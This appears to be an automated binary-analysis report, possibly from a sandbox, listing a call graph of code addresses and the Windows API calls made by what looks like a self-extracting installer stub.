                                                                            Total number of Limit Nodes:16
10029 404c50 10025->10029 10026 404c70 10028 4026b0 lstrcmpW 10026->10028 10035 404c83 10028->10035 10029->10026 10030 4026b0 lstrcmpW 10029->10030 10558 40434d 10029->10558 10030->10029 10031 404ca3 10032 4026b0 lstrcmpW 10031->10032 10034 404caf 10032->10034 10036 4026b0 lstrcmpW 10034->10036 10035->10031 10037 4026b0 lstrcmpW 10035->10037 10562 40437e 10035->10562 10038 404cc0 10036->10038 10037->10035 10039 4026b0 lstrcmpW 10038->10039 10040 404cd1 10039->10040 10041 404ce7 10040->10041 10042 404cde _wtol 10040->10042 10043 4026b0 lstrcmpW 10041->10043 10042->10041 10044 404cf3 10043->10044 10045 404d03 10044->10045 10046 404cfa _wtol 10044->10046 10047 4026b0 lstrcmpW 10045->10047 10046->10045 10048 404d0f 10047->10048 10049 4026b0 lstrcmpW 10048->10049 10050 404d27 10049->10050 10051 4026b0 lstrcmpW 10050->10051 10052 404d3f 10051->10052 10052->9675 10054 40261a lstrcmpW 10053->10054 10055 4026c1 10054->10055 10055->9682 10057 404648 10056->10057 10059 404605 10056->10059 10057->9644 10057->9645 10058 40133e 2 API calls 10058->10059 10059->10058 10060 4041f8 20 API calls 10059->10060 10061 404622 SetEnvironmentVariableW ??3@YAXPAX 10060->10061 10061->10057 10061->10059 10063 401458 2 API calls 10062->10063 10064 404556 10063->10064 10065 4027aa 2 API calls 10064->10065 10066 40455f GetTempPathW 10065->10066 10067 404578 10066->10067 10072 40458f 10066->10072 10068 4027aa 2 API calls 10067->10068 10069 404583 GetTempPathW 10068->10069 10069->10072 10070 4027aa 2 API calls 10071 4045b2 wsprintfW 10070->10071 10071->10072 10072->10070 10073 4045c9 GetFileAttributesW 10072->10073 10074 4045ed 10072->10074 10073->10072 10073->10074 10074->9722 10076 401745 10075->10076 10091 40d041 3 API calls 10076->10091 10077 401769 10078 401794 10077->10078 10570 40110a 10077->10570 10080 408dbf 57 API calls 10078->10080 10084 40179c 10080->10084 10082 4017bc 10083 4017d4 ??2@YAPAXI 10082->10083 10085 4036f1 88 API calls 10082->10085 10086 4017e0 10083->10086 10087 4017e7 
10083->10087 10084->9739 10088 4017cf 10085->10088 10593 401470 10086->10593 10574 401611 10087->10574 10088->10083 10088->10084 10091->10077 10093 402426 10092->10093 10094 40242b 10092->10094 10093->9840 10095 40236f 3 API calls 10094->10095 10096 402430 10095->10096 10097 402441 10096->10097 10098 40243a 10096->10098 10097->9840 11011 4023e9 LoadLibraryA GetProcAddress 10098->11011 10102 4044c6 2 API calls 10101->10102 10103 4048b7 10102->10103 10104 401429 2 API calls 10103->10104 10105 4048c2 10104->10105 10106 4048c7 10105->10106 10107 40133e 2 API calls 10106->10107 10108 4048d5 10107->10108 10109 4027c2 2 API calls 10108->10109 10110 4048e0 10109->10110 10110->9858 10112 401458 2 API calls 10111->10112 10113 404f78 10112->10113 10114 401458 2 API calls 10113->10114 10115 404f80 memset 10114->10115 10116 404fae 10115->10116 10117 404a97 2 API calls 10116->10117 10118 404fd1 10117->10118 10119 401370 2 API calls 10118->10119 10120 404fdc 10119->10120 10121 404fe1 ??3@YAXPAX 10120->10121 10122 404ffa ShellExecuteExW 10120->10122 10123 404fec ??3@YAXPAX 10121->10123 10124 405014 10122->10124 10125 40503a 10122->10125 10123->9864 10126 405028 CloseHandle 10124->10126 10127 40501d WaitForSingleObject 10124->10127 10128 405031 ??3@YAXPAX 10125->10128 10126->10128 10127->10126 10128->10123 10130 407c87 4 API calls 10129->10130 10131 404eb5 10130->10131 10132 402187 19 API calls 10131->10132 10133 404ec3 10132->10133 10134 402771 2 API calls 10133->10134 10135 404ecd 10134->10135 10136 404f03 wsprintfW 10135->10136 10138 4027c2 ??2@YAPAXI ??3@YAXPAX 10135->10138 10137 4027c2 2 API calls 10136->10137 10139 404f31 10137->10139 10138->10135 10140 4027c2 2 API calls 10139->10140 10141 404f3e 10140->10141 10142 407ce8 22 API calls 10141->10142 10143 404f53 ??3@YAXPAX 10142->10143 11013 407a5b ??3@YAXPAX 10143->11013 10145 404f64 10145->9563 10147 40cdda ctype 3 API calls 10146->10147 10148 404521 10147->10148 10149 40ccfd ctype 3 API calls 10148->10149 10150 40ce45 
??3@YAXPAX 10149->10150 10150->9551 10152 4052b4 10151->10152 10158 4052d0 10151->10158 10155 4052c6 _wtol 10152->10155 10152->10158 10153 404f67 9 API calls 10154 4052f3 10153->10154 10156 405301 10154->10156 10157 4052fb GetLastError 10154->10157 10155->10158 10156->9563 10157->10156 10158->10153 10160 40ca5c 2 API calls 10159->10160 10161 4054ed 10160->10161 10162 405549 10161->10162 10164 402771 2 API calls 10161->10164 10163 402823 2 API calls 10162->10163 10165 405551 10163->10165 10170 4054fc 10164->10170 10166 4028b9 2 API calls 10165->10166 10167 40555e 10166->10167 10168 402953 2 API calls 10167->10168 10172 40556b 10168->10172 10169 4055ba ??3@YAXPAX 10175 4055b6 10169->10175 10170->10169 10171 4036f1 88 API calls 10170->10171 10173 405520 10171->10173 10174 402953 2 API calls 10172->10174 10173->10169 10177 40ca5c 2 API calls 10173->10177 10176 405578 10174->10176 10175->9620 10178 402953 2 API calls 10176->10178 10180 40553c 10177->10180 10179 405585 10178->10179 10181 40d0a5 2 API calls 10179->10181 10180->10169 10182 405540 ??3@YAXPAX 10180->10182 10183 405599 10181->10183 10182->10162 10183->10169 10184 4055a2 ??3@YAXPAX 10183->10184 10184->10175 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 
API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 
4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 
10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 
10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 
3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 
10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 402697 10526->10527 10528 40266f lstrcmpW 10526->10528 10527->9987 10529 402686 10528->10529 10529->10527 10529->10528 10533 402625 10530->10533 10531 402631 lstrcmpW 10532 40264e 10531->10532 10531->10533 10532->9987 10533->10531 10533->10532 10534->9987 10536 402d4b 10535->10536 10537 402d3f 10535->10537 10539 402823 2 API calls 10536->10539 10553 401bdf GetStdHandle WriteFile 10537->10553 10541 402d55 10539->10541 10540 402d46 10552 40269a ??3@YAXPAX ??3@YAXPAX 10540->10552 10542 402d80 10541->10542 10547 40292b 2 API calls 10541->10547 10543 402ad8 3 API calls 10542->10543 10544 402d92 10543->10544 10545 402da0 10544->10545 10546 402db4 10544->10546 10548 408dbf 57 API calls 10545->10548 10549 408dbf 57 API calls 10546->10549 10547->10541 10550 402daf ??3@YAXPAX ??3@YAXPAX 10548->10550 10549->10550 10550->10540 10552->9977 10553->10540 10555 4043c4 10554->10555 10566 4042ea 10555->10566 10559 40435a 10558->10559 10560 4042ea _wtol 10559->10560 10561 40437b 10560->10561 10561->10029 10563 40438b 10562->10563 10564 4042ea _wtol 10563->10564 10565 4043a3 10564->10565 10565->10035 10567 4042f4 10566->10567 10568 40430f _wtol 10567->10568 10569 404348 10567->10569 10568->10567 10569->10023 10598 410e26 10570->10598 10606 410329 _EH_prolog 10570->10606 10571 40112a 10571->10078 10571->10082 10575 401624 10574->10575 10576 401370 2 API calls 10575->10576 10577 401631 10576->10577 10578 401526 2 API calls 10577->10578 10579 40163a CreateThread 10578->10579 10580 401669 10579->10580 10581 40166e WaitForSingleObject 10579->10581 11005 4012e3 10579->11005 10582 40851f 25 API calls 10580->10582 10583 40168b 10581->10583 10584 4016bd 10581->10584 10582->10581 10587 4016a9 10583->10587 10589 40169a 10583->10589 10585 4016b9 10584->10585 10586 4016c5 GetExitCodeThread 10584->10586 10585->10084 10588 4016dc 10586->10588 10590 408dbf 57 API calls 10587->10590 10588->10585 10588->10589 10591 40170b 
SetLastError 10588->10591 10589->10585 10592 408dbf 57 API calls 10589->10592 10590->10585 10591->10589 10592->10585 10594 401458 2 API calls 10593->10594 10595 401489 10594->10595 10596 401458 2 API calls 10595->10596 10597 401495 10596->10597 10597->10087 10599 410e38 10598->10599 10605 40d041 3 API calls 10599->10605 10600 410e4c 10603 410e83 10600->10603 10604 40d041 3 API calls 10600->10604 10601 410e60 10601->10603 10622 410ccb 10601->10622 10603->10571 10604->10601 10605->10600 10607 410349 10606->10607 10608 410e26 11 API calls 10607->10608 10609 41036e 10608->10609 10610 410390 10609->10610 10611 410377 10609->10611 10650 4127aa _EH_prolog 10610->10650 10653 40ff49 10611->10653 10635 40e0d0 10622->10635 10624 410cf7 10624->10603 10625 410ce3 10625->10624 10638 40e036 10625->10638 10628 410d30 10629 410dc4 ??3@YAXPAX 10628->10629 10630 410dcf ??3@YAXPAX 10628->10630 10632 410dad memmove 10628->10632 10633 410dd9 memcpy 10628->10633 10629->10624 10630->10624 10632->10628 10634 40d041 3 API calls 10633->10634 10634->10630 10646 40e085 10635->10646 10639 40e080 memcpy 10638->10639 10640 40e043 10638->10640 10639->10628 10641 40e048 ??2@YAPAXI 10640->10641 10642 40e06e 10640->10642 10643 40e070 ??3@YAXPAX 10641->10643 10644 40e058 memmove 10641->10644 10642->10643 10643->10639 10644->10643 10647 40e0c9 10646->10647 10648 40e097 10646->10648 10647->10625 10648->10647 10649 40d00d GetLastError 10648->10649 10649->10648 10661 412525 10650->10661 10988 40fdd9 10653->10988 10683 40fc0a 10661->10683 10806 40fb7b 10683->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fb84 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fb8c 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fb94 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fb9c 10813->10814 10815 40cdda ctype 3 API calls 10814->10815 10816 40fba4 10815->10816 10817 40cdda ctype 3 API calls 10816->10817 10818 40fbac 10817->10818 10819 40cdda ctype 3 API calls 
10818->10819 10820 40fbb6 10819->10820 10821 40cdda ctype 3 API calls 10820->10821 10822 40fbbe 10821->10822 10823 40cdda ctype 3 API calls 10822->10823 10824 40fbcb 10823->10824 10825 40cdda ctype 3 API calls 10824->10825 10826 40fbd3 10825->10826 10827 40cdda ctype 3 API calls 10826->10827 10828 40fbe0 10827->10828 10829 40cdda ctype 3 API calls 10828->10829 10830 40fbe8 10829->10830 10831 40cdda ctype 3 API calls 10830->10831 10832 40fbf5 10831->10832 10833 40cdda ctype 3 API calls 10832->10833 10834 40fbfd 10833->10834 10989 40cdda ctype 3 API calls 10988->10989 10990 40fde7 10989->10990 11006 4012ec 11005->11006 11007 4012ff 11005->11007 11006->11007 11008 4012ee Sleep 11006->11008 11009 401338 11007->11009 11010 40132a EndDialog 11007->11010 11008->11006 11010->11009 11012 40240b 11011->11012 11012->10093 11013->10145 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile
APIs
• ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
  • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
  • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
  • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
  • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
  • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
  • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
  • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
• GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
• GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
  • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
  • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
  • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
  • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
  • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
  • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
• _wtol.MSVCRT ref: 00405825
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
• GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
• _wtol.MSVCRT ref: 00405A25
• ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
• ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
• wsprintfW.USER32 ref: 00405D2A
  • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
  • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
  • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
• GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
  • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
  • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
  • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
• _wtol.MSVCRT ref: 00405F6B
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
• GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
• SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                            • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                            • _wtol.MSVCRT ref: 00406338
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                            • GetKeyState.USER32(00000010), ref: 004063BE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
